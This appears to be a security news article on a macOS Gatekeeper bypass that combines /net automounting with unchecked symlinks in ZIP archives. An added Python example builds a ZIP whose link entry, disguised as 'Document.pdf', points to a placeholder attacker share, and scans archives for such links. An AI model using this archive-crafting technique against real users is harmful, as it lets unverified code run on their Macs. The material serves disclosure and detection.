- The flaw could be exploited to bypass Gatekeeper in macOS and execute malicious code without the usual checks.
- Gatekeeper is a security mechanism created by Apple to make sure only verified applications run on Mac systems.
A serious security hole has been disclosed in macOS that can allow attackers to run harmful applications on Macs. The flaw was discovered by security researcher Filippo Cavallarin. According to Cavallarin, Gatekeeper treats both external drives and network shares as safe locations and lets any application stored on them run without verification. Because a specially crafted ZIP file can point the victim at an attacker-controlled network share, malicious code delivered this way can be executed.
Details at a glance
- Gatekeeper's faulty behavior was observed in what was then the latest macOS version, 10.14.5. At the time of writing no patch is available, but Cavallarin has suggested a workaround in his blog (disabling the automount feature by commenting out the /net entry in /etc/auto_master).
- Cavallarin explained that the behavior could be exploited by combining two legitimate features in macOS. The first is autofs/automount, which automatically mounts a network share when a user accesses any path starting with "/net/", for example "/net/hostname/sharename".
- The second is the way macOS handles ZIP files containing symbolic links. macOS does not perform any security checks on these links when decompressing the archive, so a link to an arbitrary path, including an automount path, is extracted as-is.
- As a result, attackers can craft a ZIP file containing a symbolic link to an attacker-controlled share under /net/. When the victim extracts the archive and opens the link, macOS mounts the share, and an application placed on it runs without Gatekeeper checks. Cavallarin also created a proof-of-concept (PoC) exploit.
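The following is an added example, not Cavallarin's proof of concept, showing how a ZIP archive carries a symbolic link (an entry whose data is the link target and whose Unix mode bits have S_IFLNK set) and a scanner that flags archives whose links point into the autofs /net tree or otherwise escape the extraction directory. The host and share name in the link target are placeholders chosen for the example.

```python
"""
Build and scan ZIP archives for symbolic-link entries that point into the
macOS automount tree (/net/...). Added example for illustration; not the
researcher's PoC. The target host and share below are made up.
"""
import io
import stat
import zipfile

# Hypothetical attacker-controlled automount path (placeholder, not from the advisory).
AUTOMOUNT_TARGET = "/net/attacker.example.com/share"


def build_zip(entries):
    """Return ZIP bytes for a list of (name, data, is_link) tuples.

    A symlink is stored as an ordinary entry whose content is the link target
    and whose Unix mode (upper 16 bits of external_attr) has S_IFLNK set.
    Python's zipfile does not create real links on extraction, but macOS
    Archive Utility and Info-ZIP unzip honour these mode bits.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data, is_link in entries:
            info = zipfile.ZipInfo(name)
            info.create_system = 3  # 3 = Unix, so extractors honour the mode bits
            if is_link:
                info.external_attr = (stat.S_IFLNK | 0o777) << 16
            else:
                info.external_attr = (stat.S_IFREG | 0o644) << 16
            zf.writestr(info, data)
    return buf.getvalue()


def is_symlink(info):
    """True when the entry's Unix mode bits mark it as a symbolic link."""
    return stat.S_ISLNK(info.external_attr >> 16)


def find_suspicious_symlinks(zip_bytes):
    """Return (entry_name, target, reason) for every symlink worth blocking.

    Links into /net/ are flagged first because that is the automount path
    abused here; absolute targets and '..' escapes are flagged as well.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not is_symlink(info):
                continue
            target = zf.read(info).decode("utf-8", "replace")
            if target.startswith("/net/"):
                reason = "points into autofs /net automount tree"
            elif target.startswith("/"):
                reason = "absolute symlink target"
            elif ".." in target.split("/"):
                reason = "symlink escapes extraction directory"
            else:
                continue  # relative link inside the archive: allowed
            findings.append((info.filename, target, reason))
    return findings


if __name__ == "__main__":
    # Constructed sample: a link disguised as a document plus a harmless text file.
    sample = build_zip([
        ("Document.pdf", AUTOMOUNT_TARGET, True),
        ("readme.txt", b"nothing to see here", False),
    ])
    for entry, target, reason in find_suspicious_symlinks(sample):
        print(f"BLOCK {entry} -> {target}: {reason}")
```

The scanner works on the archive before extraction, which is the point: once the link exists on disk, opening it is enough to trigger the automount.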
Apple fails to patch issue
Cavallarin said that although he reported the issue to Apple, the company did not fix Gatekeeper by the agreed date. "The vendor has been contacted on February 22nd 2019 and it's aware of this issue. This issue was supposed to be addressed, according to the vendor, on May 15th 2019 but Apple started dropping my emails. Since Apple is aware of my 90 days disclosure deadline, I make this information public," the security researcher said.